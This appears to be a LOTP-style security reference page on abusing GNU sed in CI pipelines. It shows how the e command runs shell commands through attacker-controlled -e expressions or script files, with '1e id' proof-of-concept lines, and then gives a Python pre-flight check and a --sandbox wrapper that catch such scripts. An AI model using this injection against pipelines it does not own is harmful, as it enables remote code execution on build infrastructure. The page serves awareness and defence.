LOTP

sed

cli config-file eval-sh

sed or gsed is a line-oriented text processing utility that processes input streams or files and can modify text files efficiently.

Injection

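In the GNU version of sed, the e command executes a shell command. If the attacker controls the script expression, whether it is passed with -e or --expression or as the first non-option argument (as in the -n example below), RCE is achieved. See GTFOBins: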

sed -n '1e id' any.txt
sed -e '1e id' any.txt
sed --expression '1e id' any.txt

Script file

If an attacker-controlled script is used (-f, --file), RCE is achieved:

sed -f script.sed any.txt
sed --file script.sed any.txt

script.sed

1e id

sed scripts can have any extension, but commonly use .sed or .filter.
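
A pre-flight check a pipeline could run before invoking sed on a script it did not author, shown here as an added example (not from the original page or from GTFOBins). The function names find_exec_commands and safe_sed_argv are hypothetical, and the scan is a heuristic that covers only the e command shown above.

```python
import re

# One sed address: line number (optionally first~step), "$", or /regex/ with I/M flags.
_ADDR = r"(?:\d+(?:~\d+)?|\$|/(?:\\.|[^/\\])*/[IM]*)"
# Leading braces, an optional address or range, then optional "!" and "{".
_PREFIX = re.compile(
    rf"^[\s{{}}]*(?:{_ADDR}(?:\s*,\s*(?:{_ADDR}|[+~]\d+))?)?[\s!{{]*"
)


def find_exec_commands(script: str) -> list[str]:
    """Return every piece of a sed script that looks like an e (execute) command.

    Heuristic and fail-closed: splitting on ";" can flag a harmless ";e"
    inside an s/// pattern or a/i/c text, which is acceptable for a gate.
    """
    hits = []
    for line in script.splitlines():
        if line.lstrip().startswith("#"):  # whole-line comment
            continue
        for piece in line.split(";"):
            command = _PREFIX.sub("", piece, count=1)
            # No other sed command starts with "e", so one letter is enough.
            if command.startswith("e"):
                hits.append(piece.strip())
    return hits


def safe_sed_argv(script: str, script_path: str, input_path: str) -> list[str]:
    """Refuse scripts containing e commands; otherwise build a sandboxed argv."""
    hits = find_exec_commands(script)
    if hits:
        raise ValueError(f"sed script contains execute commands: {hits}")
    # GNU sed's --sandbox rejects e/w/r commands; it backs up the static check.
    return ["sed", "--sandbox", "-f", script_path, "--", input_path]


if __name__ == "__main__":
    # Constructed sample scripts, not taken from a real repository.
    samples = {
        "benign.sed": "s/foo/bar/g\n/^#/d\n",
        "page_example.sed": "1e id\n",
        "nested.sed": "s/a/b/\n$!{e id}\n",
    }
    for name, text in samples.items():
        print(name, "->", find_exec_commands(text) or "no e command found")
```

The same scan can be applied to a string destined for -e or --expression by passing that string as the script argument of find_exec_commands.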